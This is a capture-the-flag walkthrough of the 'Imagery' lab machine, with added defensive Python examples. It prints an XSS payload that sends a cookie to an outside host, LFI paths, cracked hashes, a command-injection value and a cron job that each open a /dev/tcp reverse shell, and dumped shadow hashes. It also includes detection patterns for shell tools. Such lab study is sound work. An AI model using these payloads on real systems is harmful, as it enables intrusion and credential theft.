Basic Information

Port Scan

Ports 22 and 8000:

$ nmap -sC -sV -Pn 10.10.11.88
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-04 17:55 JST
Nmap scan report for 10.10.11.88
Host is up (0.18s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.7p1 Ubuntu 7ubuntu4.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 35:94:fb:70:36:1a:26:3c:a8:3c:5a:5a:e4:fb:8c:18 (ECDSA)
|_ 256 c2:52:7c:42:61:ce:97:9d:12:d5:01:1c:ba:68:0f:fa (ED25519)
8000/tcp open http Werkzeug httpd 3.1.3 (Python 3.12.7)
|_http-server-header: Werkzeug/3.1.3 Python/3.12.7
|_http-title: Image Gallery
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.88 seconds

8000

An image-processing related site:

Imagery

Register and log in with any account; the only feature is image upload:

Report Bug & XSS

The one place with interaction is the Report Bug feature: submitted reports are viewed automatically by a bot, so a standard XSS yields a cookie:

<img src=1 onerror="document.location='http://10.10.14.15:7777/'+document.cookie">

session=.eJw9jbEOgzAMRP_Fc4UEZcpER74iMolLLSUGxc6AEP-Ooqod793T3QmRdU94zBEcYL8M4RlHeADrK2YWcFYqteg571R0EzSW1RupVaUC7o1Jv8aPeQxhq2L_rkHBTO2irU6ccaVydB9b4LoBKrMv2w.aODceA.M945rHcGvPXTzQMPw81g07EmRxA
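The bot that opens bug reports is the real risk here: whatever the report body contains runs in a session that holds the admin cookie. As an added defensive example (not code from the page or from the Imagery application), the two controls that break this chain on the server side are escaping the report body before rendering it and marking the session cookie HttpOnly so scripts cannot read it. The function names and the sample report are constructed for this example.

```python
import html
from http.cookies import SimpleCookie


def render_report(body: str) -> str:
    """Escape user-supplied report text before it is embedded in HTML.
    html.escape converts & < > " ' to entities, so markup in a report is
    displayed as text and never parsed by the reviewer's browser."""
    return '<pre class="report">' + html.escape(body, quote=True) + "</pre>"


def session_set_cookie(value: str, secure: bool = True) -> str:
    """Build the Set-Cookie value for the session cookie with HttpOnly,
    SameSite=Lax and (by default) Secure. HttpOnly keeps the cookie out of
    document.cookie, so a script running in the reviewer's browser cannot
    read it; this limits the impact of an XSS, it does not prevent the XSS."""
    jar = SimpleCookie()
    jar["session"] = value
    jar["session"]["httponly"] = True
    jar["session"]["samesite"] = "Lax"
    if secure:
        jar["session"]["secure"] = True
    # output(header="") yields " session=...; HttpOnly; ..."; drop the leading space
    return jar.output(header="").strip()


# Constructed sample report body (a generic markup probe, not the page's payload).
SAMPLE_REPORT = '<img src=1 onerror="alert(1)">'


if __name__ == "__main__":
    print(render_report(SAMPLE_REPORT))
    print("Set-Cookie:", session_set_cookie("abc123"))
```

Flask, which Werkzeug serves here, sets `SESSION_COOKIE_HTTPONLY` to True by default, so a cookie readable from `document.cookie` means the application either overrode that default or issues its own cookie; output escaping remains the fix for the injection itself.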

Admin Panel & LFI

After replacing the cookie, we can access the Admin Panel:

The admin has a log-viewing feature, which turns out to be a standard LFI:

From there it is a matter of reading files one by one; db.json finally gives us the password hashes, and the testuser password can be cracked:

/proc/self/cmdline
/proc/self/cwd/app.py
/proc/self/cwd/config.py
/proc/self/cwd/db.json

admin@imagery.htb
5d9c1d507a3f76af1e5c97a3ad1eaa31

testuser@imagery.htb
2c65c8d7bfbca32a3ed42596192384f6
iambatman
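The log viewer fails because it takes a file name from the request and opens it as given, so `/proc/self/cwd/app.py` is as valid as a log name. As an added defensive example (not code from the page or from the Imagery application), this is a lookup that resolves the requested name and refuses anything that lands outside a fixed directory; the directory `/var/log/imagery` and the function names are hypothetical.

```python
from pathlib import Path

# Hypothetical directory the log viewer is meant to serve from (not from the page).
LOG_ROOT = Path("/var/log/imagery")


class UnsafePath(ValueError):
    """Raised when a requested name would resolve outside the log root."""


def resolve_log_path(name: str, root: Path = LOG_ROOT) -> Path:
    """Map a user-supplied log name to a file strictly under root.

    Checks, in order: no empty names or NUL bytes; resolve symlinks and
    '..' components; require the result to still lie under the resolved
    root. An absolute name such as /proc/self/cmdline replaces root when
    joined with it, so it fails the containment check like any other escape.
    """
    if not name or "\x00" in name:
        raise UnsafePath("empty name or embedded NUL")
    root_real = root.resolve()
    candidate = (root_real / name).resolve()
    if candidate == root_real:
        raise UnsafePath("a directory is not a log file")
    try:
        candidate.relative_to(root_real)
    except ValueError:
        raise UnsafePath(f"{name!r} resolves outside {root_real}") from None
    return candidate


def is_allowed(name: str, root: Path = LOG_ROOT) -> bool:
    """Boolean wrapper around resolve_log_path for quick checks."""
    try:
        resolve_log_path(name, root)
        return True
    except UnsafePath:
        return False


if __name__ == "__main__":
    for candidate in ("app.log", "../../../proc/self/cmdline", "/proc/self/cwd/db.json"):
        print(f"{candidate!r}: {'allowed' if is_allowed(candidate) else 'rejected'}")
```

The stricter alternative is to not take a path at all: map a short identifier (`app`, `access`) to a fixed file via a dictionary and reject unknown keys. That also avoids exposing the `db.json` credential store that sat in the same working directory as the app.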

testuser & Command Injection

After logging in as testuser, there is an option to change the image size. Reading the corresponding code through the earlier LFI reveals a command injection: the parameters are concatenated straight into the command.

So we get a shell through the command injection:

"height":"1920; bash -c \"bash -i >& /dev/tcp/10.10.14.15/4444 0>&1\" #"
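The `height` value above works because the application builds one shell string from user input. As an added example (not code from the page or from the Imagery application), here is the vulnerable string-building pattern the page describes next to a hardened version that validates the dimensions and hands an argv list to `subprocess` without a shell. The page does not say which resize tool is invoked; ImageMagick's `convert` is assumed here, as are the function names.

```python
import re
import subprocess

# A dimension is a plain decimal integer with no sign, spaces or punctuation.
DIMENSION_RE = re.compile(r"[1-9][0-9]{0,4}")
MAX_DIMENSION = 8192  # upper bound to keep resize jobs cheap


def parse_dimension(value) -> int:
    """Accept a positive integer dimension and nothing else."""
    text = str(value).strip()
    if not DIMENSION_RE.fullmatch(text):
        raise ValueError(f"invalid dimension: {value!r}")
    n = int(text)
    if n > MAX_DIMENSION:
        raise ValueError(f"dimension too large: {n}")
    return n


def is_valid_dimension(value) -> bool:
    try:
        parse_dimension(value)
        return True
    except ValueError:
        return False


def build_resize_command_vulnerable(src, dst, width, height) -> str:
    """The pattern the page describes: untrusted values interpolated into a
    shell command string that the app then runs through a shell. Shown for
    contrast only; the string is returned, not executed."""
    return f"convert {src} -resize {width}x{height} {dst}"


def build_resize_argv(src, dst, width, height) -> list:
    """Hardened form: validate first, then build an argv list. With
    shell=False each element reaches the program as one argument, so ';',
    quotes and redirections carry no meaning."""
    w, h = parse_dimension(width), parse_dimension(height)
    return ["convert", src, "-resize", f"{w}x{h}", dst]


def resize_image(src, dst, width, height, run=subprocess.run):
    """Run the hardened command; `run` is injectable so callers can test
    without ImageMagick installed."""
    argv = build_resize_argv(src, dst, width, height)
    return run(argv, check=True, timeout=30)


if __name__ == "__main__":
    print(build_resize_command_vulnerable("in.png", "out.png", "1920", "1080; echo injected"))
    print(build_resize_argv("in.png", "out.png", "1920", "1080"))
    print(is_valid_dimension("1920; echo injected #"))
```

`src` and `dst` need the same care: an upload name chosen by the user should be replaced with a server-generated one before it ever reaches argv, and an ImageMagick policy that disables risky coders is a sensible second layer.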

backup

In /var/backup there is an encrypted backup, web_20250806_120723.zip.aes; download it locally:

$ file web_20250806_120723.zip.aes
web_20250806_120723.zip.aes: AES encrypted data, version 2, created by "pyAesCrypt 6.1.1"

This shows it was encrypted with pyAesCrypt, so we crack it with a tool built for that format:

  • GitHub - marcobellaccini/pyAesCrypt: A Python 3 module and script that uses AES256-CBC to encrypt/decrypt files and streams in AES Crypt file format (version 2).
    https://github.com/marcobellaccini/pyAesCrypt
  • GitHub - Nabeelcn25/dpyAesCrypt.py: dAescrypt.py is a multithreaded brute-force tool to crack .aes files encrypted using the pyAesCrypt library. It supports password length filtering, progress display with ETA, and optional decryption after cracking.
    https://github.com/Nabeelcn25/dpyAesCrypt.py
# Crack the password, then decrypt
python3 dpyAesCrypt.py ../web_20250806_120723.zip.aes ~/Tools/dict/rockyou.txt -t 100

[✅] Password found: bestfriends

db.json

The extracted files also contain a db.json, which gives a new user and hash; the corresponding password is cracked:

mark@imagery.htb
01c3d2e5bdaf6134cec0a367cf53e535
supersmash

web@imagery.htb
84e3c804cf1fa14306f26f9f3da177e0

user flag

The mark account we obtained cannot log in via SSH directly, so switch to it from the web shell:

Privilege Escalation Information

charcol can be run with sudo. Testing shows its shell feature requires a password, but the password can simply be reset:

Then read the help output inside the shell to learn the command format and features; it can add scheduled tasks:

Privilege Escalation & root flag

So we add a scheduled task that executes a command:

auto add --schedule "* * * * *" --command "bash -c 'bash -i >& /dev/tcp/10.10.14.15/4444 0>&1'" --name "miao"
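A job added this way has two properties a defender can key on: it runs every minute and its command spawns an interactive shell over a `/dev/tcp` redirection. As an added detection example (not code from the page or from charcol), this scans crontab text for those patterns; the sample crontab is constructed for the example and uses the documentation address 203.0.113.5.

```python
import re

# (label, pattern) pairs for command text that rarely belongs in a legitimate job
SUSPICIOUS_PATTERNS = [
    ("bash /dev/tcp redirection", re.compile(r"/dev/tcp/")),
    ("interactive shell from a job", re.compile(r"\bbash\s+-i\b")),
    ("netcat with exec", re.compile(r"\b(nc|ncat)\b[^|;]*\s-e\s")),
    ("download piped to a shell", re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b")),
]
# Five bare '*' fields: the job runs every minute, which is unusual for real maintenance.
EVERY_MINUTE = re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s+")


def suspicious_cron_entries(crontab_text: str):
    """Return [(line_no, reasons, line)] for crontab lines worth a look."""
    findings = []
    for no, raw in enumerate(crontab_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or VAR=value assignment
        reasons = [label for label, pat in SUSPICIOUS_PATTERNS if pat.search(line)]
        if EVERY_MINUTE.match(line):
            reasons.append("runs every minute")
        if reasons:
            findings.append((no, reasons, line))
    return findings


# Constructed sample crontab (not from the page); one benign nightly job,
# one every-minute reverse shell of the kind the page adds, one benign 5-minute job.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=root
0 2 * * * /usr/local/bin/backup.sh
* * * * * bash -c 'bash -i >& /dev/tcp/203.0.113.5/4444 0>&1'
*/5 * * * * /usr/bin/python3 /opt/app/rotate_logs.py
"""


if __name__ == "__main__":
    for no, reasons, line in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"line {no}: {', '.join(reasons)}\n    {line}")
```

Run it over `/etc/crontab`, `/etc/cron.d/*` and each user's crontab from `crontab -l -u <user>`; the more durable fix is not granting sudo to a tool that can schedule arbitrary commands as root, since that is equivalent to granting root.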

Then just wait for it to trigger:

shadow

root:$y$j9T$OVSThp/6ybogilellugDf.$Le2uXxNfrXRiH18puL.GI7fnu2hYxttVASa.OMFvjs4:20286:0:99999:7:::
web:$y$j9T$bSJcB7IM6SVHob8SVJQ2X/$L16rTrWlInaJ6EvPTXO3CTiUP88xtNClzOJkwXIIL0D:20303:0:99999:7:::
mark:$y$j9T$m1reIJvzn7/7hhJ26v8WV1$3zPWU7HPsUn0P133BsMZDar.XmDq1T3AbJrfi.Nc6x3:20350:0:99999:7:::

References

  • GitHub - marcobellaccini/pyAesCrypt: A Python 3 module and script that uses AES256-CBC to encrypt/decrypt files and streams in AES Crypt file format (version 2).
    https://github.com/marcobellaccini/pyAesCrypt
  • GitHub - Nabeelcn25/dpyAesCrypt.py: dAescrypt.py is a multithreaded brute-force tool to crack .aes files encrypted using the pyAesCrypt library. It supports password length filtering, progress display with ETA, and optional decryption after cracking.
    https://github.com/Nabeelcn25/dpyAesCrypt.py